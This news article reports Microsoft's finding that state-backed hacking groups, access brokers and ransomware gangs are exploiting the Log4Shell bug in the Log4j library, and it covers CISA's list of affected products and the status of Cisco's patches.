State-sponsored hackers from China, Iran, North Korea and Turkey have started testing, exploiting and using the Log4j bug to deploy malware, including ransomware, according to Microsoft.
As predicted by officials at the US Cybersecurity and Infrastructure Security Agency (CISA), more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228), which affects devices and applications running vulnerable versions of the Log4j Java library. It's a potent flaw that allows remote attackers to take over a device after compromise.
CISA officials on Tuesday warned that hundreds of millions of enterprise and consumer devices are at risk until the bug is patched.
The bulk of attacks that Microsoft has observed so far have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.
"The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems," Microsoft said.
Its ease of exploitation and wide distribution in products makes it an attractive target for sophisticated criminal and state-sponsored attackers.
It is this latter group that has now started exploiting the flaw.
"This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives," Microsoft said.
Microsoft has turned the spotlight on the Iranian hacking group it tracks as Phosphorous, which recently ramped up their use of file-encryption tools to deploy ransomware on targets. The group has acquired and modified the Log4j exploit for use, according to the Microsoft Threat Intelligence Center (MSTIC).
"We assess that Phosphorus has operationalized these modifications," the MSTIC notes.
Hafnium, a Beijing-backed hacking group behind this year's Exchange Server flaws, has also been using Log4Shell to "target virtualization infrastructure to extend their typical targeting."
Microsoft saw the systems used by Hafnium employing a Domain Name Server (DNS) service to fingerprint systems.
The Log4Shell bug was disclosed by the Apache Software Foundation on December 9. CERT New Zealand reported the bug was actively being exploited. Apache released a patch last week. However, vendors including Cisco, IBM, Oracle, VMware and others still need to integrate the patch into their own affected products before customers can deploy them.
MSTIC and the Microsoft 365 Defender team also confirmed that "access brokers" -gangs who sell or rent access to compromised machines -have been using the Log4j flaw to gain a foothold in target networks on both Linux and Windows systems. This sort of access is frequently sold on to ransomware gangs looking for victims; security firm BitDefender reported that a new ransomware strain called Khonsari is already attempting to exploit the Log4j bug.
CISA yesterday published its list in GitHub of products affected by the Log4Shell flaw, following a similar list by the Netherlands cybersecurity agency (NCSC) published earlier this week. CISA lists the vendor, product, versions, status of vulnerability, and whether an update is available.
The US list will be a handy tool for organizations as they patch affected devices, in particular US federal agencies that were ordered by CISA, a unit of the Department of Homeland Security, yesterday to test which internal applications and servers are vulnerable to the bug by December 24.
Cisco customers will be busy over the next few weeks as it rolls out patches. Just looking at, for example, Cisco's list of affected products highlights the work ahead for agency teams that must enumerate affected systems ahead of the Christmas break. CISA's list also includes an extensive array of affected VMware virtualization software tools, most of which don't have a patch available yet.
Dozens of Cisco software and network products are affected. Cisco released a patch for Webex Meetings Server yesterday. The Cisco CX Cloud Agent Software also got a patch.
Other affected Cisco products without a patch include Cisco's AMP Virtual Private Cloud Appliance, its Advanced Web Security Reporting Application, Firepower Threat Defense (FTD), and Cisco Identity Services Engine (ISE). Several network infrastructure management and provision products are also vulnerable, with patches scheduled for December 21 and onwards.